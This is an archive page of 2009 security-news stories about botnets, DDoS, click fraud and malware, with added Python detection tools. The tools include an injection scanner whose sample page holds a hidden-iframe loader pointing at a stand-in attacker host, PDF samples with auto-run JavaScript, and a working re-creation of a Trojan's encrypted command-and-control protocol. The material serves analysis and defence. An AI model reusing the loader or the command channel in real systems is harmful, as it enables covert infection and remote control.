CyberInsecure.com

Daily cyber threats and internet security news: network security, online safety and latest security alerts

Archive for the ‘Botnets’ Category

Websites Of The Swedish Police And 40 Media Sites Fall Victim To DDoS Attack

Saturday, October 31st, 2009

Swedish authorities are no closer to discovering who may have been behind two distributed denial-of-service (DDoS) attacks that downed the websites of the police and some 40 media sites on Thursday.

The media companies affected by the initial attack all rent server space from Swedish IT service provider Basefarm. According to Basefarm, the attack was specifically aimed at one of its clients, media IT development company Adeprimo. “Normally, a website with relatively high traffic will receive around 800 requests per second,” said Basefarm CEO Sara Murby Forste in a statement. “During the attack on Adeprimo, we were registering around 400,000 requests per second,” she added.

News websites affiliated with the Stampen media group, which uses Adeprimo’s media platform, were among those hardest hit. These include main Gothenburg newspaper Göteborgs-Posten, whose site was inaccessible from early morning until lunchtime on Thursday.

Basefarm said it did not receive any warning or threat prior to the attack. The company is preparing to submit a report to the police and is continuing an internal investigation into the attack.

“We know from the nature of the attack that they possess a lot of knowledge. This took place in a planned manner, outside Europe, and with serious force,” said Basefarm’s technical manager Stefan Månsby. “There is much to suggest that the traffic came from Asia and the United States. It could well be Asian, bouncing via the US.”

A second attack later in the day knocked out the website of the Swedish police, which was down for a couple of hours in the late afternoon. Police IT experts believe the two attacks are almost certainly linked. “I don’t think it’s a coincidence,” said Ann-Marie Alverås, head of the national police’s web security division. “The amount of traffic was exactly the same in both attacks and we too witnessed traffic from the United States. But the saboteur could be anywhere in the world,” she added.

Thursday’s attacks are to be investigated by the police’s IT crimes unit. Ann-Marie Alverås said the purpose of the attacks remained a mystery. “But I can hazard a guess that it was to attract attention,” she said.
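The only hard numbers in the story are Basefarm’s two figures: roughly 800 requests per second on a busy site normally, about 400,000 during the attack. That ratio is what an operator sees first, in the access log, before anyone knows the source. The script below is an added example, not Basefarm’s or the police’s tooling: it parses combined-format access-log lines, counts requests per second, flags seconds that exceed a baseline by a chosen factor, and lists the addresses carrying the flood. The log lines, addresses, baseline and factor are constructed for illustration.

```python
"""Added example, not from the article or from Basefarm: spot a request
flood in web-server access logs and list the addresses driving it.

The only real numbers here are the ones quoted in the article (about 800
requests/second normal, about 400,000 during the attack); the log lines,
addresses and thresholds below are constructed."""
import re
from collections import Counter, defaultdict
from datetime import datetime

# Apache/nginx "combined" format; only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (epoch_second, source_ip, request_line) or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), TS_FMT)
    return int(ts.timestamp()), m.group("ip"), m.group("req")


def requests_per_second(lines):
    """Map each second to a Counter of the source IPs seen in that second."""
    per_sec = defaultdict(Counter)
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            sec, ip, _ = parsed
            per_sec[sec][ip] += 1
    return per_sec


def find_spikes(lines, baseline_rps, factor=10, top_n=3):
    """Seconds whose request count exceeds baseline_rps * factor, each with
    the top_n sources responsible.  A handful of addresses carrying most of
    the flood points at a small set of senders or reflectors; thousands of
    addresses with a few requests each is the truly distributed case that
    cannot be filtered by source."""
    spikes = []
    for sec, sources in sorted(requests_per_second(lines).items()):
        total = sum(sources.values())
        if total > baseline_rps * factor:
            spikes.append((sec, total, sources.most_common(top_n)))
    return spikes


def _line(ip, ts, path="/"):
    """Build one constructed access-log line."""
    return f'{ip} - - [{ts}] "GET {path} HTTP/1.1" 200 512 "-" "Mozilla/5.0"'


# Constructed log: two quiet seconds around one flooded second.
SAMPLE_LOG = (
    [_line(f"192.0.2.{i}", "29/Oct/2009:08:00:00 +0100") for i in range(1, 4)]
    + [_line(f"203.0.113.{1 + i % 4}", "29/Oct/2009:08:00:01 +0100", f"/?r={i}")
       for i in range(60)]
    + [_line("192.0.2.9", "29/Oct/2009:08:00:02 +0100")]
)

if __name__ == "__main__":
    for sec, total, top in find_spikes(SAMPLE_LOG, baseline_rps=2):
        print(f"t={sec}: {total} req/s, top sources {top}")
```

Run against a real log, the baseline should come from the site’s own history (a percentile of requests per second over the preceding week, say), not a guess; and the top-source list is only useful when the flood is concentrated. Basefarm’s 500-fold jump would trip any sane factor.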

Credit: thelocal.se


Click Fraud From Malware-Infected Botnets At Record High

Saturday, October 24th, 2009

Malware-infected computers are increasingly being used to perpetrate click fraud, according to a study released Thursday that found their contribution was the highest since researchers began compiling statistics on the crime.

In the third quarter of this year, 42.6 percent of fraudulent clicks were generated by computers that were part of botnets, compared with 36.9 percent the previous quarter and about 27.6 percent in the same period of 2008. The increase comes as criminals trying to profit from click fraud take advantage of new advances in malware that make the practice harder to detect.

“As the botnets get more sophisticated, they’re able to perpetrate more click fraud,” said Paul Pellman, CEO of Click Forensics, the advertising auditing firm that prepared the report. “They’re finding new ways of being distributed, and that’s reflected in the data.”

The jump in botnet use over the past year comes as the overall amount of click fraud dropped, from 16 percent of all paid ads in Q3 of 2008 to 14.1 percent last quarter. That means manual forms of click fraud, in which large numbers of individuals engage in the practice, have decreased by an even larger margin. Many of those people get paid to knowingly game the advertising results, while others are tricked into it.

The data was compiled by monitoring pay-per-click campaigns on more than 300 ad networks and on advertisers’ web sites.

Click fraud attempts to siphon away the commissions advertisers pay web site operators each time an ad on one of their pages is clicked on by a legitimate visitor. Fraudsters often set up websites with little or no content and then pocket big profits when ads from Google and other providers are viewed through the process.

Automated click fraud has existed for years, but over the past few months, researchers have identified several botnets that prominently offer such capabilities. Both the web-based infection known as Gumblar and the so-called Bahama Botnet contain malware that causes infected PCs to return altered Google results. When users click on them, they are taken to a series of intermediate links before arriving at their final destination.

“It’s in everyone’s best interest in the online community to find and stamp out click fraud,” Pellman said. “The fraudsters are trying to stay a step ahead of those efforts.”
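The report describes the pattern but not how an auditor separates bot clicks from human ones. The script below is an added example and is not Click Forensics’ methodology: it scores a pay-per-click log with two simple heuristics, per-source click cadence (a bot on a timer clicks at near-constant intervals, a person reading pages does not) and the share of each publisher’s clicks that come from flagged sources (the content-free site pocketing commissions). The event layout, the thresholds, the heuristics themselves and the click records are this example’s assumptions.

```python
"""Added example, not from the article or Click Forensics' methodology:
score pay-per-click logs for botnet-style automated clicking.  The event
format, the thresholds and the heuristics are this example's assumptions;
the click records below are constructed."""
from collections import defaultdict
from statistics import mean, pstdev


def flag_automated_ips(events, min_clicks=5, max_cv=0.2):
    """events: iterable of (epoch_seconds, source_ip, publisher, ad_id).

    Returns {ip: reason} for sources with at least min_clicks clicks whose
    inter-click gaps are nearly constant (coefficient of variation at or
    below max_cv).  A bot on a timer produces that regularity; a person
    reading pages between clicks does not."""
    stamps_by_ip = defaultdict(list)
    for ts, ip, _, _ in events:
        stamps_by_ip[ip].append(ts)
    flagged = {}
    for ip, stamps in stamps_by_ip.items():
        if len(stamps) < min_clicks:
            continue
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg else 0.0
        if cv <= max_cv:
            flagged[ip] = f"{len(stamps)} clicks, gap cv={cv:.3f}"
    return flagged


def publisher_bot_share(events, flagged_ips):
    """Fraction of each publisher's clicks that came from flagged sources.
    A site with little content whose clicks are mostly bot-driven is the
    'park a page and pocket the commissions' pattern the article describes."""
    total, bad = defaultdict(int), defaultdict(int)
    for _, ip, publisher, _ in events:
        total[publisher] += 1
        if ip in flagged_ips:
            bad[publisher] += 1
    return {p: bad[p] / total[p] for p in total}


def _bot_clicks(ip, start, publisher, n=10):
    """Constructed: n clicks on rotating ads at a jittered ~30 s cadence."""
    gaps = [30, 31, 29] * 4
    ts, out = start, []
    for i in range(n):
        out.append((ts, ip, publisher, f"ad-{i % 3}"))
        ts += gaps[i]
    return out


SAMPLE_CLICKS = (
    # two human visitors of a real news site: few clicks, irregular gaps
    [(t, "198.51.100.5", "news.example", "ad-0") for t in (0, 47, 300)]
    + [(t, "198.51.100.6", "news.example", "ad-1") for t in (10, 25, 130, 131, 410, 910)]
    # one of them also clicks once on the content-free site
    + [(500, "198.51.100.6", "cheap-content.example", "ad-2")]
    # three bots clicking through the content-free site's ads
    + _bot_clicks("203.0.113.1", 1000, "cheap-content.example")
    + _bot_clicks("203.0.113.2", 1005, "cheap-content.example")
    + _bot_clicks("203.0.113.3", 1010, "cheap-content.example")
)

if __name__ == "__main__":
    bots = flag_automated_ips(SAMPLE_CLICKS)
    print("flagged:", bots)
    print("bot share by publisher:", publisher_bot_share(SAMPLE_CLICKS, bots))
```

Cadence alone is a weak signal once the malware adds random sleeps, which is exactly the “new advances in malware that make the practice harder to detect” the report alludes to; in practice it is combined with conversion rate, user-agent consistency and known-infected address lists.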

Credit: The Register


Sections Of PBS.org Website Hijacked, Serving A Cocktail Of Dangerous Exploits

Sunday, September 20th, 2009

Some sections of the popular PBS.org Web site have been hijacked by hackers serving up a cocktail of dangerous exploits, according to researchers at Purewire. Attempts to access certain PBS Web site pages yielded JavaScript that serves exploits from a malicious domain via an iframe.

The malicious JavaScript was found on the “Curious George” page that provides content on the popular animation series. A look at the code on the hijacked site shows malicious activity coming from a third-party qxfcuc.info domain.

The domain qxfcuc.info is part of a malware campaign that includes dozens of similar websites hosted off a handful of common IP addresses. Similar exploit code was served from most of these domains, although a handful (e.g., yyoqny.info) display a message that suggests the criminal behind this campaign is compromising systems to build a botnet he will likely later lease. Translated from Russian, that message tells prospective leasers to “Send a message to ICQ #559156803; stats available under ststst02.”

The URL serves exploits that target a variety of software vulnerabilities, including those in Acrobat Reader (CVE-2008-2992, CVE-2009-0927, and CVE-2007-5659), AOL Radio AmpX (CVE-2007-6250), AOL SuperBuddy (CVE-2006-5820) and Apple QuickTime (CVE-2007-0015).


PBS.org has already removed the malicious JavaScript from its site.
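The injection pattern here, a script dropped into a legitimate page that writes an iframe pointing at a domain the site does not own, is easy to check for in your own pages once you know what to look for. The scanner below is an added example, not Purewire’s or PBS’s code: it parses HTML and reports iframes that are external or sized to be invisible, external script sources, and inline scripts using the usual loader idioms (unescape, String.fromCharCode, document.write of an iframe). The sample page is constructed, and malicious.example stands in for the attacker’s domain rather than the one named in the article.

```python
"""Added example, not from the article or from Purewire: a scanner for the
kind of injection described above, a script or iframe that pulls content
from a domain the site does not own, or an iframe sized to be invisible.
The HTML below is constructed; malicious.example stands in for the
attacker's domain and is not the one named in the article."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Idioms seen in injected loaders: decoding an escaped/char-coded payload,
# or writing an iframe into the page from script.
OBFUSCATION_RE = re.compile(
    r"unescape\s*\(|String\.fromCharCode|document\.write\s*\(.*iframe", re.I | re.S
)


class InjectionScanner(HTMLParser):
    def __init__(self, first_party_domains):
        super().__init__()
        self.first_party = {d.lower() for d in first_party_domains}
        self.findings = []          # (kind, detail, reasons)
        self._in_script = False
        self._script_buf = []

    def _is_external(self, url):
        host = (urlparse(url or "").hostname or "").lower()
        if not host:                 # relative URL: same origin
            return False
        return not any(host == d or host.endswith("." + d) for d in self.first_party)

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            reasons = []
            style = a.get("style", "").replace(" ", "").lower()
            if a.get("width") in ("0", "1") or a.get("height") in ("0", "1") \
                    or "display:none" in style or "visibility:hidden" in style:
                reasons.append("hidden")
            if self._is_external(a.get("src")):
                reasons.append("external")
            if reasons:
                self.findings.append(("iframe", a.get("src"), reasons))
        elif tag == "script":
            self._in_script = True
            if self._is_external(a.get("src")):
                self.findings.append(("script-src", a.get("src"), ["external"]))

    def handle_data(self, data):
        if self._in_script:          # script bodies may arrive in chunks
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            body = "".join(self._script_buf)
            self._script_buf, self._in_script = [], False
            if OBFUSCATION_RE.search(body):
                self.findings.append(("inline-script", body.strip()[:60], ["obfuscation"]))


def scan_html(html, first_party_domains):
    """Return the list of suspicious elements found in html."""
    scanner = InjectionScanner(first_party_domains)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed page: the site's own script, then two injected elements.
SAMPLE_PAGE = """<html><head>
<script src="http://www.pbs.org/js/site.js"></script>
<script>var a = 1; /* first-party inline code */</script>
</head><body>
<h1>Curious George</h1>
<script>document.write(unescape('%3Ciframe src=%22http://malicious.example/in.cgi%3F3%22 width=0 height=0%3E%3C/iframe%3E'));</script>
<iframe src="http://malicious.example/in.cgi?3" width="0" height="0"></iframe>
</body></html>"""

if __name__ == "__main__":
    for kind, detail, reasons in scan_html(SAMPLE_PAGE, ["pbs.org"]):
        print(f"{kind:14} {','.join(reasons):18} {detail}")
```

The first-party allowlist is the important input: a CDN or analytics host you legitimately use belongs in it, otherwise every page lights up. Run this over a crawl of your own site on a schedule and diff the findings; a new external host appearing overnight is the signal PBS would have wanted.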

Credit: ZDnet.com Security Blogs


Google Groups Used By Trojan As Command Network

Monday, September 14th, 2009

Hackers have programmed a Trojan that uses Google Groups newsgroups to distribute commands. Trojan distribution via newsgroups has existed for more than a decade, but using newsgroups as a command and control channel is new.

The Grups Trojan itself is quite simple and is only noteworthy for the command and control structure it deploys. The malware is programmed to log into a Chinese language newsgroup to receive commands, Symantec security researcher Gavin O’Gorman writes.

When successfully logged in, the Trojan requests a page from a private newsgroup, escape2sun. The page contains commands for the Trojan to carry out. The command consists of an index number, a command line to execute, and optionally, a file to download. Responses are uploaded as posts to the newsgroup using the index number as a subject.

The post and page contents are encrypted using the RC4 stream cipher and then base64 encoded. The attacker can thus issue confidential commands and read responses. If no command is received from the static page, the infected host uploads the current time.
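The message handling just described is simple enough to reconstruct end to end, which is also what a defender has to do to read the traffic. The code below is an added example, not Symantec’s analysis code and not the Trojan’s: the controller side seals a command (index, command line, optional file to download) with RC4 and base64, the bot side decodes it and posts a reply under the index as subject, and with no command it posts the current time. The field separator, the keep-alive subject and the key are this example’s assumptions, since the article gives neither the wire layout nor the key; nothing is executed, the caller supplies the “output”.

```python
"""Added example, not Symantec's analysis code or the Trojan's own: a
re-creation of the message handling described above, with the controller
side (posting an RC4-encrypted, base64-encoded command) and the bot side
(decoding it and posting an encrypted reply under the index as subject).
The field separator '|', the keep-alive subject and the key are this
example's assumptions; the article gives neither the wire layout nor the
key.  No command is executed here, the 'output' is supplied by the caller."""
import base64
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Optional


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 key scheduling plus keystream XOR; the same call encrypts and
    decrypts.  RC4 is not fit for anything you build yourself today; it is
    here because that is what the Trojan used."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def seal(key: bytes, text: str) -> str:
    """RC4 then base64: what both the command page and the reply post carry."""
    return base64.b64encode(rc4(key, text.encode("utf-8"))).decode("ascii")


def unseal(key: bytes, blob: str) -> str:
    return rc4(key, base64.b64decode(blob)).decode("utf-8")


@dataclass
class Command:
    index: int
    cmdline: str
    download: Optional[str] = None   # file to fetch before running cmdline


def encode_command(key: bytes, cmd: Command) -> str:
    """Controller side: the body of the static page the bot polls."""
    return seal(key, "|".join([str(cmd.index), cmd.cmdline, cmd.download or ""]))


def decode_command(key: bytes, page: str) -> Optional[Command]:
    """Bot side: None when the page carries no command."""
    text = unseal(key, page).strip()
    if not text:
        return None
    index, cmdline, download = text.split("|", 2)   # cmdline must not contain '|'
    return Command(int(index), cmdline, download or None)


def build_reply(key: bytes, cmd: Optional[Command], output: str) -> tuple:
    """Bot side: (subject, body) of the newsgroup post.  With no command the
    bot posts the current time instead, which is the beacon a defender can
    count to size the infection."""
    if cmd is None:
        return ("beacon", seal(key, datetime.now(timezone.utc).isoformat()))
    return (str(cmd.index), seal(key, output))


if __name__ == "__main__":
    key = b"constructed-key"
    page = encode_command(key, Command(17, "ipconfig /all", "http://example.invalid/upd.bin"))
    cmd = decode_command(key, page)
    subject, body = build_reply(key, cmd, "Windows IP Configuration ...")
    print(page, "->", cmd, "->", subject, unseal(key, body))
```

The design point for the analyst is the one the article makes: the key is embedded in the sample, so once it is recovered every post in the group, commands and replies alike, reads in the clear, and the subject lines alone give the command index sequence and the victim count.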

Miscreants need to maintain communications with backdoor Trojans to order them to distribute spam, launch denial of service attacks or upload compromised data, for example. Traditionally IRC channels have been used to carry out this function. More recently black hats have experimented with different control channels such as Google Groups, as in the latest incident, and a few weeks ago, Twitter.

Using Google Groups has advantages in anonymity but leaves a record of Trojan activity for security researchers to analyze. For example, the growth of the Trojan can be tracked by the volume of posts. The information targeted can also be discerned.

Examining the Trojan itself provides more clues. Several debug strings in the Trojan code provide evidence that the malware may be a prototype, testing the use of newsgroups for botnet/Trojan command and control. Commands issued through the newsgroup refer to actions involving .tw (Taiwanese) domains. This, along with the simplified Chinese language of the newsgroup in question, provides evidence that the malware was cooked up in either Taiwan or mainland China.

Only a small number of samples of the Grups Trojan have appeared in the wild, leading to Symantec’s classification of the malware as a low-risk threat.

Credit: The Register


Ilomo Botnet Makes A Mockery Of Banks’ Secure Login Systems

Monday, August 24th, 2009

Ilomo has been present in the malware landscape since at least the end of 2005, making it a veteran of the modern malware era. During that time it has changed its code constantly with an emphasis being placed on making the malware very difficult to reverse engineer, and also with the goal of staying under the radar. As with all malware it has picked up several names over that time but the most common are Ilomo, Clampi, Ligats or Rscan.

The Ilomo botnet has been active without attracting too much unwanted attention from the security industry. Like the Pushdo botnet, the Ilomo threat is quite modular in nature, which makes it difficult to see the actions of the overall threat. Added to this is the fact that it uses a commercial virtual machine obfuscator, significantly adding to the effort involved in reverse engineering the malware binaries.

Ilomo has two key components to its business plan. The first is good old-fashioned information stealing. Ilomo injects its code into the browser and monitors the internet connection, waiting for the user to connect to one of over 4000 banking, financial or webmail sites. Not content with simply stealing the user’s credentials, Ilomo can also “piggyback” on the user’s session, transferring funds from an infected user’s account and making a mockery of the bank’s secure login system. Ilomo will also harvest all other login credentials from the machine (FTP, web servers, local administrator accounts, etc.). These are then used to spread itself across the network and to take control of web servers online, which it will use to host new versions of the malware.

Ilomo’s second source of revenue is selling “anonymity as a service”. Every infected Ilomo machine acts as a proxy so that criminals can route their illegal activities through different networks and countries. In addition to hiding the criminals’ identity, this proxy network is very useful for defeating another defense built into many banking sites, namely that they can only be accessed from certain countries. If a criminal needs to access a Brazilian bank, they simply use an infected Ilomo machine in Brazil to route the connection.

More information and detailed technical aspects can be found in the TrendLabs Malware Blog post credited below.

Credit: TrendLabs Malware Blog by Trend Micro


Distributed Denial Of Service Attack Takes Down Twitter

Friday, August 7th, 2009

Twitter was knocked offline on Thursday after the site became the victim of a distributed denial of service attack. Users of the micro-blogging service are used to seeing the fail whale, a graphic that appears when service is over capacity, but this time around the site was left completely unreachable from around 1500 on Thursday (UK time) for around 90 minutes.

A terse message on Twitter’s status blog initially said the site was down before adding “We are defending against a denial-of-service attack, and will update status again shortly”.

Graham Cluley, a security consultant at Sophos, initially said the hallmarks of the outage were not those of a planned downtime.

“Something has clearly gone wrong,” he said. “It could be human error or some other cause. We have nothing to indicate that the outage is caused by a security problem at this point.”

The outage has at least one positive effect. “All those Twitter addicts will be doing something more useful instead,” Cluley quipped.

As Twitter struggled to return to normal Thursday evening, a trickle of details suggested that the outage that left 30 million users unable to use the micro-blogging service for several hours may have been, at least in part, the result of a spam campaign that targeted a single user who vocally supports the Republic of Georgia.

According to Bill Woodcock, research director at the non-profit Packet Clearing House, the torrent of traffic that brought the site to its knees wasn’t the result of a traditional DDoS, or distributed denial of service attack, but rather people who clicked on a link in spam messages that referenced a well-known blogger called Cyxymu.

As spam goes, the emails looked benign enough. One of them carried the subject “Visit my blog” and contained the words “thanks for looking at my blog” in the body. They contained respective links to Cyxymu’s accounts on Twitter, Facebook, LiveJournal and YouTube, all of which also reported receiving abnormal amounts of traffic on Thursday.

“This was not like a botnet-style DDoS,” Woodcock told The Register. “This was a joejob where people were just clicking on links in email and the people clicking on the links were not malefactors. They were just the sort of idiots that click on links in email without knowing what they are.”

Joejobs are spam messages that are designed not to push Viagra but to induce someone to click on a link in the hopes of harming the site being linked to.

Twitter has so far said little on its blog and status page except that it spent much of the day fighting against a denial of service attack and that as late as 4:45 pm California time, latency problems were still causing some users to receive error pages. Company representatives didn’t respond to emails seeking comment.

The theory was backed by a CNET News article, which quoted Facebook’s chief security officer saying the attacks targeting multiple websites all contained traffic linking to accounts held by Cyxymu.

“It was a simultaneous attack across a number of properties targeting him to keep his voice from being heard,” Facebook’s Max Kelly told reporter Elinor Mills. “We’re actively investigating the source of the attacks and we hope to be able to find out the individuals involved in the back end and to take action against them if we can.”

Kelly made no reference to spam messages, so it remained unclear if the emails were the only cause of the mass requests to Cyxymu’s profiles or if there were other causes as well.

Cyxymu has long been viewed as an antagonist by some Russian supporters, who take issue with the blogger’s coverage of recent military conflicts in Georgia.

Credit: The Register


Latvian ISP Real Host Disconnected From The Internet Due To Cybercrime Servers Hosting

Wednesday, August 5th, 2009

Upstream providers have pulled the plug on Latvian ISP Real Host over allegations it maintained cybercrime servers linked to the Zeus botnet.

Real Host was disconnected by its upstream provider, Junik, on Monday, after TeliaSonera told Junik to either cut the juice or face sanctions itself, according to reports by the FT and other news outlets.

Like other disconnected hosting companies before it, such as McColo and Atrivo, Real Host was linked to an unsavory list of botnet-related cybercrime activities.

Security researchers, who described Real Host as a cybercrime and bulletproof hosting hub, said its systems acted as command and control nodes for the Zeus botnet and as a locus for exploits based on a recently patched Adobe Flash vulnerability, among other crimes. Hostexploit has published a full breakdown of the extensive charge sheet against Real Host.

The enforcement action against Real Host is the first time the internet community has put pressure on upstream providers to take action against an allegedly rogue ISP in eastern Europe.

Credit: The Register


Bredolab Massively Infects Machines Through PDF And SWF Files, Makes It Into Top Ten Threats List

Friday, July 17th, 2009

ESET have issued a press release concerning Win32/TrojanDownloader.Bredolab.AA, which made the top ten threat listing in ESET’s June ThreatSense.Net report.

The Bredolab trojan is the top-scoring threat in the Czech Republic and Slovakia, and also scores high in other European countries. It appears in the Top 5 list of threats in Austria, Poland and Turkey; in the Top 10 in Bulgaria, the United Kingdom, Sweden, Belgium, Russia and Germany; in the Top 20 in Ukraine and Italy; and in the Top 40 in France. In Ireland it has climbed from 40th place into the Top 15.

Bredolab is a downloader, a class of malware that acts as an intermediary in the infection process. The label is applied to a range of variants that commonly inject themselves into running processes and attempt to disable some security processes, while creating a registry key that ensures the malicious executable is run at every system startup. It communicates with its command and control (C&C) server over HTTP. This malware has been associated with other malware activity such as Gumblar and Win32/Wigon. There is a great deal of Bredolab activity in combination with Flash (SWF) and Acrobat (PDF) exploits, so it is more important than ever to keep up with Adobe updates and patches as well as Microsoft’s. Indeed, nowadays it pays to keep an eye on new patches for any applications and utilities you use. Hopefully, Adobe’s new patching mechanisms will help to reduce the impact of these exploits in the longer term.

When a downloader is installed and active on a system, its main (or only) job is to download malware from a remote site, but it may well make changes to the system such as those described above in order to increase its chances of doing so successfully. There have also been some cases when Bredolab Trojan was downloaded by other downloaders in the Win32/TrojanDownloader.FakeAlert family, demonstrating a connection to rogue security application malware.

Other vendors describe different variant suffixes (.G, .HW etc.) as referring to this detection: however, because of the varying detection algorithms used by different vendors, it’s unlikely that there will be an exact match in all cases.

The use of file formats such as PDF which most users think of as trustworthy is not a new tactic: in fact, like other document formats such as those used by Microsoft Office, they’re commonly used in targeted phishing attacks. However, the noticeable rise in Bredolab detections, especially in Europe, demonstrates that it is extremely active at the moment.
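Patching is the fix; triage is what you do with the attachment in the meantime. The script below is an added example, not ESET’s or the article’s: in the spirit of Didier Stevens’ pdfid it counts the PDF name tokens that let a document act on its own or carry active content (/JavaScript, /JS, /OpenAction, /AA, /Launch, /EmbeddedFile, /RichMedia), after undoing two cheap ways of hiding them from a grep, hex-escaped names (/J#53 for /JS) and Flate-compressed object streams. The sample documents are constructed and the keyword list is this example’s; a count of zero is a reason to look further, not a clean bill.

```python
"""Added example, not from ESET or the article: a quick triage of a PDF
for the things the Bredolab-era exploit documents relied on, along the
lines of Didier Stevens' pdfid.  It undoes hex-escaped names and inflates
Flate streams, two cheap ways of hiding /JavaScript from a grep.  The
sample documents are constructed; the keyword list is this example's."""
import re
import zlib

# Names that make a document act on its own or carry active content.
SUSPECT_NAMES = ["/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch",
                 "/EmbeddedFile", "/RichMedia"]
HEX_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)


def inflate_streams(data: bytes) -> bytes:
    """Append the inflated body of every stream that decompresses as Flate.
    decompressobj is used rather than zlib.decompress because the loose
    endstream match above may clip a trailing byte, and decompressobj still
    returns the data it could inflate."""
    parts = [data]
    for m in STREAM_RE.finditer(data):
        try:
            parts.append(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:
            pass                      # not Flate, or damaged: skip
    return b"\n".join(parts)


def normalise_names(data: bytes) -> bytes:
    """/J#53 is the same name as /JS to a PDF reader, but not to a grep."""
    return HEX_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def count_names(data: bytes, inflate: bool = True) -> dict:
    """Occurrences of each suspect name, matched as a whole name token so
    that /JS does not count /JSLib."""
    if inflate:
        data = inflate_streams(data)
    data = normalise_names(data)
    counts = {}
    for name in SUSPECT_NAMES:
        pattern = re.escape(name.encode()) + rb"(?![A-Za-z0-9])"
        counts[name] = len(re.findall(pattern, data))
    return counts


def triage(data: bytes) -> list:
    """Human-readable reasons to look closer; an empty list is not a clean bill."""
    c = count_names(data)
    reasons = []
    if c["/JavaScript"] or c["/JS"]:
        reasons.append("embedded JavaScript")
    if c["/OpenAction"] or c["/AA"]:
        reasons.append("action runs automatically")
    if c["/Launch"]:
        reasons.append("launch action (runs a program)")
    if c["/RichMedia"]:
        reasons.append("Flash content")
    if c["/EmbeddedFile"]:
        reasons.append("embedded file")
    return reasons


# Constructed: JavaScript fired on open, with the names hex-escaped.
ESCAPED_SAMPLE = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
5 0 obj << /S /#4AavaScript /J#53 (app.alert('constructed sample')) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Constructed: the same action dictionary hidden inside a Flate stream.
_HIDDEN = zlib.compress(b"<< /S /JavaScript /JS (app.alert('constructed sample')) >>")
COMPRESSED_SAMPLE = (
    b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"4 0 obj << /Length " + str(len(_HIDDEN)).encode() + b" /Filter /FlateDecode >>\n"
    b"stream\n" + _HIDDEN + b"\nendstream\nendobj\ntrailer << /Root 1 0 R >>\n%%EOF\n"
)

BENIGN_SAMPLE = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for label, doc in [("escaped", ESCAPED_SAMPLE), ("compressed", COMPRESSED_SAMPLE),
                       ("benign", BENIGN_SAMPLE)]:
        print(label, count_names(doc), triage(doc))
```

Flate is only one filter; a document using /ASCIIHexDecode, /LZWDecode or several filters chained will still hide its names from this check, and an attacker can also split the action across object streams. Treat the output as a sorting aid for a mail gateway or an analyst’s queue, then open anything flagged in a tool that actually parses the object graph.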

Users should, as always, take care when opening e-mail attachments and exercise caution while browsing the web, but they should also be sure to keep up with security patches to application software.

Credit: ESET ThreatBlog


Beware Of Independence Day Malware Spam By Waledac Botnet

Friday, July 3rd, 2009

Researchers at ESET have reliable intelligence that the Waledac botnet is currently being prepared for a spam campaign around the Independence Day theme. The criminals behind Waledac have registered at least 18 domain names all related to the theme of video, fireworks and Independence Day, and are preparing to start sending spam with links to supposed videos of Independence Day fireworks which are, in reality, fresh copies of the Waledac malware family.

ESET estimates the size of Waledac’s botnet as tens of thousands of infected computers. More than 20,000 compromised computers will be used to send the malicious emails, in an effort to increase the size of the botnet. This effort will allow the criminals to send out even more spam. Currently, detection of the new variants of Waledac is quite low, with only a handful of antivirus products detecting the newest threat.

The Waledac family has been active since the end of 2008 and has been known to exploit events such as Christmas or Valentine’s day in order to spread in a way very similar to methods used by the infamous Storm Worm. Also, just like the Storm Worm, Waledac uses a peer-to-peer network to receive commands from its controllers. The main objective behind the Waledac operation is to use infected computers to send spam.

Consumers are reminded not to follow links in unsolicited emails, even if they appear to come from someone they know. As dangerous as fireworks can be, when used as directed, they are still safer than unsolicited emails!

Credit: ESET ThreatBlog
Credit: Websense


US Federal Trade Commission Shuts Down Malware And Child Porn Provider 3FN.net

Thursday, June 4th, 2009

Federal authorities have shut down what they said was the worst US-based web hosting provider after convincing a judge it actively participated in the distribution of child pornography, spam, malware, and other net-based menaces.

The US Federal Trade Commission obtained the court order against 3FN.net, a service provider with servers mostly located in San Jose, California that also operated under the name Pricewert. Dated June 2, it commanded all companies providing upstream services to 3FN to immediately pull the plug. The order was issued in secret to prevent the operators from being able to destroy evidence or find new hosts, something FTC attorneys said was necessary given the extreme nature of the data it hosted.

